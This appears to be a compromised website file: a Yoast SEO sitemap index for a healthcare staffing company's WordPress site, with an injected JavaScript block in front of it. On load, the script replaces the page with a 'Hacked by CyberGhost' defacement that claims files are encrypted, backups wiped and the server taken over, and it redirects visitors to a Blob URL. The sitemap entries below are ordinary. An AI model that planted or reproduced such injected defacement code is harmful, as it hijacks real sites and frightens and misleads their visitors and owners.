<script>
const hackedHTML = `
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Hacked by CyberGhost</title>
  <style>
    body {
      background-color: black;
      color: red;
      font-family: 'Courier New', monospace;
      text-align: center;
      padding-top: 60px;
      animation: flicker 1.5s infinite alternate;
    }
    h1 {
      font-size: 64px;
      margin-bottom: 10px;
      text-transform: uppercase;
    }
    p {
      font-size: 22px;
      margin: 10px 0;
    }
    .skull {
      font-size: 100px;
      margin: 40px 0;
    }
    .glow {
      text-shadow: 0 0 10px red, 0 0 20px crimson, 0 0 30px darkred;
    }
    .warning {
      font-size: 18px;
      margin-top: 40px;
      color: white;
    }
    @keyframes flicker {
      0% { opacity: 1; }
      50% { opacity: 0.8; }
      100% { opacity: 0.6; }
    }
  </style>
</head>
<body>
  <div class="glow">
    <h1>⚠️ You’ve Been Hacked ⚠️</h1>
    <div class="skull">💀</div>
    <p>Hacked by <strong>CyberGhost</strong></p>
    <p>All your files have been encrypted.</p>
    <p>We have full control over your server.</p>
    <p>Backups? Gone. Logs? Wiped. Firewall? Bypassed.</p> 
    <p>#OperationBlackout #NoEscape</p>
    <div class="warning">
      <p>#cyberghost.</p> 
    </div>
  </div>
</body>
</html>
`;

const blob = new Blob([hackedHTML], { type: 'text/html' });
const url = URL.createObjectURL(blob);
window.location.href = url;

</script><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.quantumhealthcarestaffing.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.quantumhealthcarestaffing.com/post-sitemap.xml</loc>
	</sitemap>
	<sitemap>
		<loc>https://www.quantumhealthcarestaffing.com/page-sitemap.xml</loc>
		<lastmod>2024-08-15T13:11:49+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->